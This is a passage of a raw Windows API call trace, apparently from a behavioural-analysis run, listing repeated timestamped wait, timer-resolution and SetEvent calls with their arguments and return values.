WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0289.093] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0289.094] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0289.562] timeEndPeriod (uPeriod=0x1) returned 0x0 [0289.562] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0289.709] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0289.710] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0289.767] timeEndPeriod (uPeriod=0x1) returned 0x0 [0289.767] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0289.822] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0289.822] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0289.834] timeEndPeriod (uPeriod=0x1) returned 0x0 [0289.834] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0290.193] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0290.193] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0290.233] timeEndPeriod (uPeriod=0x1) returned 0x0 [0290.233] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0290.257] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0290.257] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0290.404] timeEndPeriod (uPeriod=0x1) returned 0x0 [0290.404] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0290.529] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0290.530] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0290.539] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0290.626] timeEndPeriod (uPeriod=0x1) returned 0x0 [0290.626] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0290.839] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0290.839] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0292.759] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0292.865] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0292.914] SetEvent (hEvent=0x20c) returned 1 [0292.914] SetEvent (hEvent=0x104) returned 1 [0292.914] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0292.930] timeEndPeriod (uPeriod=0x1) returned 0x0 [0292.930] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0292.992] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0292.992] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0293.048] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0293.064] timeEndPeriod (uPeriod=0x1) returned 0x0 [0293.064] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0293.170] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0293.170] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0293.194] timeEndPeriod (uPeriod=0x1) returned 0x0 [0293.194] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0293.250] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0293.250] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0293.494] timeEndPeriod (uPeriod=0x1) returned 0x0 [0293.494] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0293.589] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0293.589] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0293.658] timeEndPeriod (uPeriod=0x1) returned 0x0 [0293.659] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0293.674] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0293.674] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0295.144] SetEvent (hEvent=0x12c) returned 1 [0295.144] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0295.212] SetEvent (hEvent=0x20c) returned 1 [0295.212] SetEvent (hEvent=0x1b8) returned 1 [0295.212] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0295.271] SetEvent (hEvent=0x134) returned 1 [0295.271] SetEvent (hEvent=0x14c) returned 1 [0295.271] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0295.322] timeEndPeriod (uPeriod=0x1) returned 0x0 [0295.322] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0295.341] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0295.341] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0295.351] timeEndPeriod (uPeriod=0x1) returned 0x0 [0295.351] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0295.471] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0295.471] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0295.525] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0295.557] timeEndPeriod (uPeriod=0x1) returned 0x0 [0295.557] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0295.592] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0295.592] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0295.624] timeEndPeriod (uPeriod=0x1) returned 0x0 [0295.625] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0295.712] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0295.712] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0295.752] timeEndPeriod (uPeriod=0x1) returned 0x0 [0295.752] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0295.825] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0295.825] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0295.930] timeEndPeriod (uPeriod=0x1) returned 0x0 [0295.930] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0295.976] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0295.976] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0296.259] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0296.325] timeEndPeriod (uPeriod=0x1) returned 0x0 [0296.325] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0296.473] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0296.473] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0296.484] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0296.580] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0296.643] timeEndPeriod (uPeriod=0x1) returned 0x0 [0296.643] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0296.654] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0296.654] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0296.933] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0297.330] timeEndPeriod (uPeriod=0x1) returned 0x0 [0297.330] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0297.375] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0297.375] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0297.439] timeEndPeriod (uPeriod=0x1) returned 0x0 [0297.439] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0297.511] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0297.511] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0297.557] SetEvent (hEvent=0x1dc) returned 1 [0297.557] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0297.628] timeEndPeriod (uPeriod=0x1) returned 0x0 [0297.628] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0297.695] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0297.695] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0297.985] timeEndPeriod (uPeriod=0x1) returned 0x0 [0297.986] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0297.996] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0297.996] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0298.079] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0298.116] SetEvent (hEvent=0x22c) returned 1 [0298.116] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0298.157] SetEvent (hEvent=0x20c) returned 1 [0298.158] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0298.204] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0298.339] SetEvent (hEvent=0x220) returned 1 [0298.339] SetEvent (hEvent=0x198) returned 1 [0298.339] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0298.507] SetEvent (hEvent=0x184) returned 1 [0298.507] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0298.531] SetEvent (hEvent=0x184) returned 1 [0298.531] SetEvent (hEvent=0x21c) returned 1 [0298.531] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0298.764] SetEvent (hEvent=0x21c) returned 1 [0298.764] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0298.924] SetEvent (hEvent=0x184) returned 1 [0298.924] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.101] SetEvent (hEvent=0x184) returned 1 [0299.101] SetEvent (hEvent=0x214) returned 1 [0299.101] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.253] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.261] SetEvent (hEvent=0x214) returned 1 [0299.261] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.546] SetEvent (hEvent=0x214) returned 1 [0299.546] SetEvent (hEvent=0x184) returned 1 [0299.546] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.716] timeEndPeriod (uPeriod=0x1) returned 0x0 [0299.716] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0299.723] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0299.723] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.736] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.741] timeEndPeriod (uPeriod=0x1) returned 0x0 [0299.741] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0299.745] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0299.745] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.759] SetEvent (hEvent=0x220) returned 1 [0299.759] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.821] timeEndPeriod (uPeriod=0x1) returned 0x0 [0299.821] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0299.835] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0299.835] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.839] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.842] timeEndPeriod (uPeriod=0x1) returned 0x0 [0299.842] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0299.898] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0299.898] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.911] SetEvent (hEvent=0x12c) returned 1 [0299.911] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.916] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.963] timeEndPeriod (uPeriod=0x1) returned 0x0 [0299.963] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0299.970] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0299.970] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.976] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0299.976] timeEndPeriod (uPeriod=0x1) returned 0x0 [0299.977] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0300.025] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0300.025] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.038] SetEvent (hEvent=0x134) returned 1 [0300.038] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.057] timeEndPeriod (uPeriod=0x1) returned 0x0 [0300.058] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0300.063] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0300.063] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.072] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.076] timeEndPeriod (uPeriod=0x1) returned 0x0 [0300.077] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0300.134] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0300.134] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.317] SetEvent (hEvent=0x12c) returned 1 [0300.317] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.426] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.431] timeEndPeriod (uPeriod=0x1) returned 0x0 [0300.431] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0300.433] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0300.435] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.438] timeEndPeriod (uPeriod=0x1) returned 0x0 [0300.438] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0300.441] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0300.441] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.446] timeEndPeriod (uPeriod=0x1) returned 0x0 [0300.446] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0300.449] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0300.449] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.451] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.475] timeEndPeriod (uPeriod=0x1) returned 0x0 [0300.475] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0300.497] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0300.497] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.506] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.610] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.631] SetEvent (hEvent=0x20c) returned 1 [0300.631] SetEvent (hEvent=0x1dc) returned 1 [0300.631] SetEvent (hEvent=0x1f0) returned 1 [0300.631] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.653] timeEndPeriod (uPeriod=0x1) returned 0x0 [0300.653] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0300.659] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0300.659] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.666] timeEndPeriod (uPeriod=0x1) returned 0x0 [0300.666] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0300.672] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0300.672] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0300.710] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0301.424] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0301.507] SetEvent (hEvent=0x184) returned 1 [0301.507] SetEvent (hEvent=0x1f0) returned 1 [0301.507] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0301.520] timeEndPeriod (uPeriod=0x1) returned 0x0 [0301.520] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0301.524] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0301.524] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0301.530] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0301.534] timeEndPeriod (uPeriod=0x1) returned 0x0 [0301.534] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0301.537] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0301.540] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0302.069] timeEndPeriod (uPeriod=0x1) returned 0x0 [0302.070] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0302.084] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0302.084] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0302.126] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0302.195] timeEndPeriod (uPeriod=0x1) returned 0x0 [0302.195] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0302.229] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0302.229] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0302.611] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0302.685] timeEndPeriod (uPeriod=0x1) returned 0x0 [0302.685] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0302.690] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0302.692] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0302.699] timeEndPeriod (uPeriod=0x1) returned 0x0 [0302.699] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0302.700] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0302.700] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0302.728] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0302.919] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.039] SetEvent (hEvent=0x21c) returned 1 [0303.039] SetEvent (hEvent=0x198) returned 1 [0303.039] SetEvent (hEvent=0x1f0) returned 1 [0303.039] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.049] SetEvent (hEvent=0x21c) returned 1 [0303.049] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.064] SetEvent (hEvent=0x1dc) returned 1 [0303.064] SetEvent (hEvent=0x22c) returned 1 [0303.064] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.699] SetEvent (hEvent=0x184) returned 1 [0303.699] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.753] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.756] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.770] timeEndPeriod (uPeriod=0x1) returned 0x0 [0303.770] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0303.786] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0303.786] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.797] timeEndPeriod (uPeriod=0x1) returned 0x0 [0303.797] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0303.804] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0303.804] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.821] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.826] timeEndPeriod (uPeriod=0x1) returned 0x0 [0303.827] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0303.836] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0303.837] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.846] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.852] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.871] timeEndPeriod (uPeriod=0x1) returned 0x0 [0303.871] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0303.873] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0303.873] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.900] timeEndPeriod (uPeriod=0x1) returned 0x0 [0303.900] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0303.909] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0303.909] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.913] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.926] timeEndPeriod (uPeriod=0x1) returned 0x0 [0303.926] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0303.931] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0303.931] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0303.999] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.037] SetEvent (hEvent=0x184) returned 1 [0304.037] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.044] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.044] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.053] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.053] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.056] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.059] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.059] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.065] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.065] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.074] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.134] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.134] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.137] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.138] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.151] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.151] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.161] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.161] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.167] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.176] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.176] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.188] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.188] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.212] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.256] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.303] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.329] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.329] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.336] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.336] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.402] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.412] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.418] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.418] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.468] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.468] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.503] SetEvent (hEvent=0x1b8) returned 1 [0304.503] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.519] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.519] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.523] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.525] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.527] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.527] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.528] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.528] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.551] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.560] SetEvent (hEvent=0x1b8) returned 1 [0304.560] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.618] SetEvent (hEvent=0x1b8) returned 1 [0304.618] SetEvent (hEvent=0x14c) returned 1 [0304.618] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.655] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.655] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.658] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.658] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.660] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.660] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.662] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.662] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.705] 